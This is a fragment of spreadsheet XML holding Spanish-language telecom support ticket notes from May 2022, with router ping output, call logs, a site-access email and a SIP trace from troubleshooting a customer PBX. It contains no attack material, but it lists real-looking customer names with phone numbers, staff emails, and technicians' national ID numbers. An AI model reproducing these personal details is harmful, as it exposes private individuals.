  </si>
  <si>
    <t>F4574235</t>
  </si>
  <si>
    <t>&lt;SILOSVZAN1D1EID1&gt;PING -C 1500 -M 30 -B -VPN-INSTANCE MINED_PM 10.130.107.122
  PING 10.130.107.122: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.130.107.122 PING STATISTICS ---
    1500 PACKET(S) TRANSMITTED
    1500 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/1 MS</t>
  </si>
  <si>
    <t>SIN GESTION DE CPE
INFO: THE DEVICE IS NOT ENABLED WITH SECURE BOOT, PLEASE ENABLE IT.
&lt;SILOSVZAN1D1EID1&gt;PING -C 1500 -M 30 -B -VPN-INSTANCE MINED_PM 10.130.107.122
  PING 10.130.107.122: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.130.107.122 PING STATISTICS ---
    1500 PACKET(S) TRANSMITTED
    1500 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/1 MS
&lt;SILOSVZAN1D1EID1&gt;TELNET VPN-INSTANCE MINED_PM 10.130.107.122</t>
  </si>
  <si>
    <t>F4574243</t>
  </si>
  <si>
    <t>SE LE LLAMA A CLIENTE JORGE 31765684  ID: 1001615792
SE DEJA EN CONFERENCIA CON JHONNSER.ESCOBAR PARA PRUEBAS PENDIENTES | WIP</t>
  </si>
  <si>
    <t>SE BRINDAN AVANCES DEL TICKET A BYRON GÓMEZ/CLIENTE; SE LE INDICA QUE TÉCNICO ESTÁ EN NODO HACIENDO LAS REVISIONES, AVANCES EN UNA HORA.</t>
  </si>
  <si>
    <t>F4574257</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE YENSI  57267830 MENCIONA QUE PERSISTE LA CAIDA, SI CUENTAN CON ENERGIA Y YA APLLICARON REINICIOS
SE SOLICITARON DATOS DE POSIBLE VISITA
-ID 1001617764
NOMBRE DEL CLIENTE: MINISTERIO DE EDUCACION
UBICACIÓN:COSTADO NORTE, ESCUELA DE EDUCACION PRIMARIA ADELITA SORTO
CONTACTO EN SITIO: YENSI  57267830
HORARIO DE ATENCION: 7:00 - 12:00 Y 13:00 16:00
GESTIÓN DE PERMISOS: UNICAMENTE IDENTIFICADOS</t>
  </si>
  <si>
    <t>F4574267</t>
  </si>
  <si>
    <t>SE LLAMA A ESTUARDO SAQUICH 59519771 ID: 1001609527, CONFIRMA SERVICIO OK, SOLICITA SE DEJE EN MONITOREO HASTA LAS 15:00 HRS, SE NOTIFICA A JURGEN.BOCH VIA SKYPE PARA EL CABIO DE ETAPA | WIP</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ESTUARDO SAQUICH 59519771 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001745422</t>
  </si>
  <si>
    <t>A NIVEL DE CLARO ENLACE OK, CRONO ANTERIOR INDICA ENLACE EN MONITOREO PARA LAS 15:00 HORAS A SOLICITUD DE CLIENTE.</t>
  </si>
  <si>
    <t>F4574269</t>
  </si>
  <si>
    <t>CLIENTE SR. MANUEL HERNANDEZ INFORMA QUE YA REALIZO LA PRUEBA DESCONECTANDO SU LAN Y CONECTANDO 2 PC PERO AUN NO LLEGA AL ANCHO DE BANDA CONTRATADO DE 10 MEGAS, SE SOLICITA APOYO DE VISITA TECNICA PARA CERTIFICAR ANCHO DE BANDA CON SUS EQUIPOS Y CONEXIONES EN SITIO REMOTO, CLIENTE SOLICITA LA VISITA PARA EL DIA MARTES 31 A LAS 09:00 AM.</t>
  </si>
  <si>
    <t>F4574273</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JOSUE CORADO AL 22259499 INDICA QUE YA SE PUEDE PROCEDER CON LA VISITA **
ID 1001629225
**</t>
  </si>
  <si>
    <t>*** SE ENVÍA CORREO A CLIENTE CON DATOS, A LA ESPERA QUE NOS CONFIRME AUTORIZACIÓN DE ACCESOS ***
DE: ANGEL DANIEL TORRES AJTUN &lt;ANGEL.TORRES@CLARO.COM.GT&gt;
ENVIADO: LUNES, 23 DE MAYO DE 2022 10:57
PARA: SOPORTE@FINCA.GT &lt;SOPORTE@FINCA.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: FUNDACION INTERNACIONAL PARA LA ASISTENCIA COMUNITARIA -- 284500078T -- MAZATENANGO
ESTIMADOS BUEN DÍA,
EN SEGUIMIENTO DEL PROBLEMA REPORTADO, SE HA GESTIONADO UNA VISITA TÉCNICA Y ASÍ VALIDAR EQUIPOS. A SU VEZ SE SOLICITA DE SU APOYO NOS PUEDA APOYAR EN GESTIONAR Y AUTORIZAR ACCESOS PARA EL PERSONAL DESCRITO A CONTINUACIÓN:
PEDROZA MARTINEZ, NERY ALBERTO 1908740660506
SAGATUME AGUILAR, ANNDY FABRISCIO 1960391771001
CUALQUIER DUDA O COMENTARIO QUEDO A LA ORDEN,
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>F4574277</t>
  </si>
  <si>
    <t>CLIENTE WILFREDO MAGAÑA 78599192 INDICA QUE SU PERSONAL ESTARÁ APROXIMADAMENTE EN 10 MINUTOS EN EL SITIO. LLAMADA DESDE VI-VO</t>
  </si>
  <si>
    <t>F4574279</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ELEZAR TREJOS  86328670 MENCIONA QUE ESTA PRESENTANDO PROBLEMA CON EL SERVICIO DE VIDEO, SE DEJA EN CONFERENCIA CON GESTOR
-ID 1001629204</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ELEZAR TREJOS  86328670 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001711579</t>
  </si>
  <si>
    <t>F4574282</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WILLIAM SALOMON 23820818 MENCIONA QUE PERSISTE LA CAIDA PERO QUE  PERSONAL TECNICO SE ENCUENTRA EN PR
CLIENTE BRINDA EL NOMBRE DE PERSONAL TECNICO (SALVADOR PORTILLO)
-ID 1001593870</t>
  </si>
  <si>
    <t>F4574298</t>
  </si>
  <si>
    <t>SE  LLAMA A CLIENTE SAMUEL MARTINEZ 43386064 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001614442</t>
  </si>
  <si>
    <t>F4574305</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE OSCAR CHACON-31868308 CLIENTE INDICA QUE YA TODO OK ##VALIDA CIERRE""POSIBLE PROBLEMA LAN ##
1001647724
COLA:
NOMBRE: A: 31868308
NÚMERO: 31868308
DURACIÓN: 0:01:09
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 31868308
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 23/05/2022 11:52:46</t>
  </si>
  <si>
    <t>CLIENTE OSCAR CHACON-31868308 COMENTA QUE TUVO RUIDO EN LAS LLAMADAS AL REDEDOR DE 15-20 MINUTOS PERO YA TODO ESTA OK-  CLIENTE REALIZARA PRUEBAS Y PIDE VALIDAR A LAS 11:30 ##
1001596617
COLA:
NOMBRE: A: 31868308
NÚMERO: 31868308
DURACIÓN: 0:02:50
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 31868308
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 23/05/2022 09:50:24</t>
  </si>
  <si>
    <t>F4574306</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE EDUARDO CASAQUI  AL 58348241 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 1001627569
**</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE EDUARDO CASAQUI 58348241
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4574308</t>
  </si>
  <si>
    <t>SE LLAMA A KATY OLIVA PERO NO RESPONDE 5818-8126</t>
  </si>
  <si>
    <t>F4574309</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARTA SANCHEZ 23263800 - 59193422 PARA BRINDAR RETROALIMENTACION
-ID 1001623462 - 1001624209</t>
  </si>
  <si>
    <t>F4574319</t>
  </si>
  <si>
    <t>SE LLAMA A LA AGENCIA, NO RESPONDEN
1001609523
COLA:
NOMBRE: A: 25041515
NÚMERO: 25041515
DURACIÓN: 0:00:35
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 25041515
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: WILLIAMSSANAVRIA
FECHA Y HORA LOCALES: 23/05/2022 10:19:54</t>
  </si>
  <si>
    <t>F4574324</t>
  </si>
  <si>
    <t>*** SE TRATÓ DE CONTACTAR CON CLIENTE ERICKA CHUN 42191149 (ID 1001804999), SIN EMBARGO, NO SE LOGRA LA COMUNICACIÓN ***</t>
  </si>
  <si>
    <t>F4574332</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SUSANA GONZALES  - 36896166 MENCIONA QUE AYER PRESNTARON UN APAGON DE ENERGIA ELECTRICA
YA RETORNO LA ENERGIA Y APLICARON REINICIO PERO INCONVENIENTE PERSISTE
-ID 1001642828
NOMBRE DEL CLIENTE: UNIVERSO OPTICO S.A.
UBICACIÓN:14 AVENIDA 9-20 ZONA 4 MIXCO CONDADO EL NARANJO LOCAL 3
CONTACTO EN SITIO: SUSANA GONZALES - 36896166
HORARIO DE ATENCION:HASTA LAS 20 HRS
GESTIÓN DE PERMISOS: UNICAMENTE IDENTIFICADOS</t>
  </si>
  <si>
    <t>F4574334</t>
  </si>
  <si>
    <t>ALEX COC/CLIENTE CALL ID 1001626356 LLAMA INDICANDO QUE ENLACE OK, PIDE SE CIERRE EL TICKET; SE INFORMA A GESTIÓN N1 VÍA SKYPE DE LO DICHO POR CLIENTE.</t>
  </si>
  <si>
    <t>F4574335</t>
  </si>
  <si>
    <t>SE LLAMÓ A TÉCNICO 58269375 PARA SEGUIMIENTO, NO CONTESTA; SE LLAMÓ/HABLÓ CON CAROLINA SOLÍS/CLIENTE 38013796 PARA BRINDARLE AVANCES DEL TICKET, INDICA QUE YA TÉCNICO ESTÁ EN SUS INSTALACIONES.</t>
  </si>
  <si>
    <t>F4574337</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE GERARDO FLAMENCO 77261041 CONFIRMA QUE EL SERVICIO ESTA ACTIVO, SE PROCEDE AL CIERRE DEL TICKET
1001733341
COLA:
NOMBRE: A: 0050377261041
NÚMERO: 0050377261041
ESTADO: CONECTADA
DURACIÓN: 0:00:41
DETALLES: 0050377261041
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSEGODINEZ
FECHA Y HORA LOCALES: 23/05/2022 15:52:26</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE GERARDO FLAMENCO 77261041 INDICA QUE YA TIENE LLAMADAS, PERO ESTA REALIZANDO PRUEBAS Y SOLICITA QUE SE LE CONTACTE A LAS 16:00 HORAS
1001680643</t>
  </si>
  <si>
    <t>F4574343</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SILVIO TORREZ 57647759 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001651022</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SILVIO TORREZ AL 57647759 || SE CONTACTA A CLIENTE Y SE DEJA EN LINEA CON GESTOR **
-ID 1001666194
**</t>
  </si>
  <si>
    <t>F4574346</t>
  </si>
  <si>
    <t>SE TIENE EL CONTACTO EL PR GISELLA LOPEZ  AL 59664475 ID 1001809741 ATIENDE Y SE LE  BRINDA LA INFORMACIÓN EN SEGUIMIENTO DEL TICKET Y COMENTA QUE YA ENVIARON UN CORREO EL DIA DE AYER A N1 Y EL INCONVENIENTE ES  DEL PUERTO DE SANTO TOMAS DE CASTILLA, COMENTA QUE CUANDO INGRESA A LA PAGINA LE PERMITE INGRESAR, PERO VER INFORMACIÓN NO ABRE Y SOLO EN MÓVILES SI LO VALIDAN, YA LO VALIDARON CON LOS DE IT DE LA PAGINA Y NO HAY ERROR POR PARTE DE LA PAGINA Y EN ALGUNAS HORAS HAY LENTITUD Y SOLICITA LOS AVANCES. POR LO QUE SE MUEVE A WIP Y SE LE NOTIFICA AL GESTOR FRANCISCO.QUEZADA VIA SLYPE EL CAMBIO.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GISELLA LOPEZ 59664475 MENCIONA QUE EL INCONVENIENTE PERSISTE, CLIENTE REPORTA LENITUD
-ID 10010832662
NOMBRE DEL CLIENTE: ASOCIACION NACIONAL DEL CAFE
UBICACIÓN:MODULO 3, EDIFICIO NAVIERAS SANTO TOMAS DE CASTILLA, IZABAL
CONTACTO EN SITIO: GISELLA LOPEZ - 59664475
HORARIO DE ATENCION:7:30 - 12:00 Y 14:00 - 17:00
GESTIÓN DE PERMISOS: UNICAMENTE IDENTIFICADOS</t>
  </si>
  <si>
    <t>F4574350</t>
  </si>
  <si>
    <t>SE LE LLAMA A CLIENTE WENDY SIQUE 54921954 ID: 1001642255,
COMENTA QUE ESTARA ESCALANDO CON SU IT, AUTORIZA CIERRE DE TKT, SE NOTIFICA A MIGUELAN.RODRIGUEZ VIA SKYPE | WIP</t>
  </si>
  <si>
    <t>F4574358</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE  FRANCISCO LUTIN, MENCIONA QUE ESTARA VALIDANDO  Y QUE SE LE MARQUE DENTRO DE 1 HORA.  SE ESTARA LLAMANDO A LAS 11:00 HORAS.
1001628812
COLA:
NOMBRE: A: 59309918
NÚMERO: 59309918
DURACIÓN: 0:01:30
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 59309918
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 23/05/2022 11:07:08</t>
  </si>
  <si>
    <t>F4574361</t>
  </si>
  <si>
    <t>SE LLAMA ALCIENTE-  BESSY LOPEZ-89913904 SE LE INDICA QUE SE SIGUE DANDOLE SEGUIMIENTO AL CASO + QUEDA ENTEREADA ##VIVO</t>
  </si>
  <si>
    <t>SE HA LLAMADO A CLIENTE  BESSY LOPEZ-89913904 ##INDICA QUE REALIZARA PRUEBAS Y SE LE CONTACTE MAÑANA 10 AM ##VIVO</t>
  </si>
  <si>
    <t>SE LLAMAA CLIENTE  BESSY LOPEZ-89913904  ##VIVO  ##I### SE LE RETROALIMENTA EL CASO, INDICA QUE SI SE REALIZARA EL CAMBIO DE EQUIPO, SE RELICE MAÑANA PERO SE LE CONFIRME MAÑANA ##VIVO ##SEGUIMIENTO EL DIA DE MAÑANA EN HORARIO DE CLIENTE , A PETICION ##</t>
  </si>
  <si>
    <t>NOTA,CLIENTE INDICA LO SIGUIENTE: NUEVA DIRECCION
SECTOR CALCULES SOBRE LA 33 CALLE OFIBODEGAS 3301 WAREHOUSE COMPLEX
##SEGUIMEINTO MAÑANA</t>
  </si>
  <si>
    <t>SE LLAMAA A CLIENTE  BESSY LOPEZ-89913904     INDICA QUE SE LE LLAME EN 15 MINUTOS- POR QUE REALIZARA PRUEBAS ##
2001308835
COLA:
NOMBRE: A: 0050489913904
NÚMERO: 0050489913904
DURACIÓN: 0:00:51
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050489913904
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 26/05/2022 09:55:14
2001308383
COLA:
NOMBRE: A: 0050489913904
NÚMERO: 0050489913904
DURACIÓN: 0:00:15
ESTADO: MARCANDO
DETALLES: 0050489913904
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 26/05/2022 09:53:59</t>
  </si>
  <si>
    <t>##SE REALIZA PRUEBAS CON CLIENTE, PERO LE SIGUE APARECNIENDO EN PANTALLA CUANDO LE LLAMA UN NUMERO DE TIGO:  %02  ### SE TOMAN DATOS PARA CERTIFICACION ##</t>
  </si>
  <si>
    <t>##SE SIGUE EN LINEA CON CLIENTE ## PBX YA RESTABLECEIO
2001314147
COLA:
NOMBRE: A: 0050489913904
NÚMERO: 0050489913904
DURACIÓN: 0:18:15
ESTADO: CONECTADA
DETALLES: 0050489913904
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 26/05/2022 10:27:00</t>
  </si>
  <si>
    <t>SE LLMA AA ALCIENTE- SE TIENE EN LINEA- ## CLIENTE EN ESTE MOMENTO NOS COMENTA QUE NO TIENE LLAMADAS SALIENTES. Y SE OBSERVA EN EQUIPO AETHRA QUE NO ESTA SACANDO  LA LLAMADA LA PBX- POR LO QUE ESTA APLICANDO RESET A SU PLANTA EN ESTE MOMENTO ##
2001314147
COLA:
NOMBRE: A: 0050489913904
NÚMERO: 0050489913904
DURACIÓN: 0:02:57
ESTADO: CONECTADA
DETALLES: 0050489913904
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 26/05/2022 10:11:42</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 3 VECES -  BESSY LOPEZ-89913904 ##ENVIA A BUZON ## SE INTENTARA NUEVAMETNE EN BREVE##VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A CILIENTE  BESSY LOPEZ-89913904  SE LE COMENTA QUE SE ESTA TRATANDO DE BRINDAR SOPORTE PARA SOLUCION DE SU INCONVENIENTE##CLIENTE QUEDA ENTERADA + SE LE INDICA QUE SE HA ESCALADO CON NUESTRO PROVEEDOR Y TENDREMOS AVANCES PARA SU CASO MAÑANA DESPUES DE LAS 11 AM ##QUEDA ENTERADA ##VIVO
NOTA: PROVEEDOR TELETECHNO  INDICA QUE NOS DARA RESOLUCION A LAS 10 AM ##
##SEGUIMIENTO MAÑANA</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  BESSY LOPEZ-89913904 ##  NO CONTESTA- ENVIA DIRECTO A BUZON 2 VECS##SE INTENTARA LUEGO
1001669696
COLA:
NOMBRE: A: 0050489913904
NÚMERO: 0050489913904
DURACIÓN: 0:00:33
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050489913904
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 23/05/2022 12:51:36
RESULTADO: LLAMADA HECHA
NOMBRE: 0050389913904
NÚMERO: 0050389913904
INICIO: HOY, 12:48
FIN: HOY, 12:48
DURACIÓN: 0:04
ID DE LLAMADA: 1001669649
RESULTADO: LLAMADA HECHA
NOMBRE: 0050389913904
NÚMERO: 0050389913904
INICIO: HOY, 12:48
FIN: HOY, 12:48
DURACIÓN: 0:04
ID DE LLAMADA: 1001669649
CON APOYO DE COMPAÑERA DE CC SE REALIZA PRUEBA Y SE OBSERVA EN TRAZA QUE SE ESTAN ENTREGANDO LOS 8 NUMEROS A LA PBX- ##PROBLEMA QUEDA EN PBX#
COLONO_AGROPECUARIO\VOIP&gt;&gt;
D1: 988.540 OFISDN: ISDN D 1 TX:  00 01 01 4B
D1: 988.540 OFISDN: ISDN D 1 RX:  00 01 01 A9
D1: 998.550 OFISDN: ISDN D 1 TX:  00 01 01 4B
D1: 998.550 OFISDN: ISDN D 1 RX:  00 01 01 A9
D1:   8.560 OFISDN: ISDN D 1 TX:  00 01 01 4B
D1:   8.560 OFISDN: ISDN D 1 RX:  00 01 01 A9
D1:  18.570 OFISDN: ISDN D 1 TX:  00 01 01 4B
D1:  18.570 OFISDN: ISDN D 1 RX:  00 01 01 A9
L1: U 23/05/2022 13:45:39:660 COSLOG: SIP_UA_SERVER.C:349 I
RECEIVED FROM 10.173.75.129:5060
INVITE SIP:25640300@P1S3PB.CLARO.COM.HN;USER=PHONE SIP/2.0
VIA: SIP/2.0/UDP 10.173.75.129:5060;BRANCH=Z9HG4BKAZ654ZE4B3A4CVVDCAHA5AOHE;ROLE=3;HPT=8E48_16
RECORD-ROUTE: &lt;SIP:10.173.75.129:5060;TRANSPORT=UDP;LR;HPT=8E48_16;CXTID=4;TRC=FFFFFFFF-FFFFFFFF;X-HWB2BUACOOKIE=212&gt;
CALL-ID: ISBCR0AR2094212230BGBDGHEFDHHIK@HNPRO1M.MSS.CLARO.COM.HN
FROM: &lt;SIP:+50497184720@HNPRO1M.MSS.CLARO.COM.HN;USER=PHONE&gt;;TAG=04010541362522
TO: &lt;SIP:25640300@P1S3PB.CLARO.COM.HN;USER=PHONE&gt;
CSEQ: 162490625 INVITE
ACCEPT: APPLICATION/SDP
ALLOW: INVITE,ACK,OPTIONS,BYE,CANCEL,PRACK,UPDATE
CONTACT: &lt;SIP:HNPRO1M.MSS.CLARO.COM.HN:5060;TRANSPORT=UDP;HPT=8E48_16;CXTID=4;TRC=FFFFFFFF-FFFFFFFF&gt;
MAX-FORWARDS: 69
SUPPORTED: 100REL,HISTINFO
P-ASSERTED-IDENTITY: &lt;SIP:+50497184720;CPC=ORDINARY@HNPRO1M.MSS.CLARO.COM.HN;USER=PHONE&gt;
P-CHARGING-VECTOR: ICID-VALUE=0C3BF2A000-0523-12420900;ICID-GENERATED-AT=HNPRO1M.MSS.CLARO.COM.HN
P-EARLY-MEDIA: SUPPORTED
CONTENT-LENGTH: 463
CONTENT-TYPE: APPLICATION/SDP
V=0
O=- 15025637 15025637 IN IP4 10.173.75.129
S=SBC CALL
C=IN IP4 10.173.75.129
T=0 0
A=SENDRECV
M=AUDIO 57620 RTP/AVP 18 8 0 96 97
C=IN IP4 10.173.75.129
B=RR:0
B=RS:0
A=RTPMAP:18 G729/8000
A=FMTP:18 ANNEXB=YES
A=RTPMAP:8 PCMA/8000
A=RTPMAP:0 PCMU/8000
A=RTPMAP:96 AMR/8000
A=FMTP:96 MODE-SET=0,2,4,7;MODE-CHANGE-PERIOD=2;MODE-CHANGE-CAPABILITY=2;MODE-CHANGE-NEIGHBOR=1;MAX-RED=0
A=RTPMAP:97 TELEPHONE-EVENT/8000
A=FMTP:97 0-15
A=MAXPTIME:40
L1: U 23/05/2022 13:45:39:660 COSLOG: SIP_UA_COMMAND.C:1056 I
SENT TO 127.0.0.1:52000
USERAGENT CALLINCOMING UACALLID D47814, REMOTE 10.173.75.129 PORTRXAUD 57620 PORTRXVID 0 CALLER +50497184720 CALLEE 25640300 CODEC G729A|G711A|G711U| PKT_TIME 0 PT_2833 97 PT_4040 0 T38EN 0 T38PORT 0 T38PROTOCOL 0 T38RATEMAN 0 T38UDPEC 0 T38_MAX_BUFFER 0 T38_MAX_DATAGRAM 0 T38_MAX_BIT_RATE 0 PRIVACY NONE PRESENTATION +50497184720 SOURCE_ADDR 179129217 SOURCE_PORT 5060
L1: U 23/05/2022 13:45:39:660 COSLOG: SIP_UA_MESSAGE.C:218 I
SENT TO 10.173.75.129:5060
SIP/2.0 100 TRYING
VIA: SIP/2.0/UDP 10.173.75.129:5060;BRANCH=Z9HG4BKAZ654ZE4B3A4CVVDCAHA5AOHE;ROLE=3;HPT=8E48_16
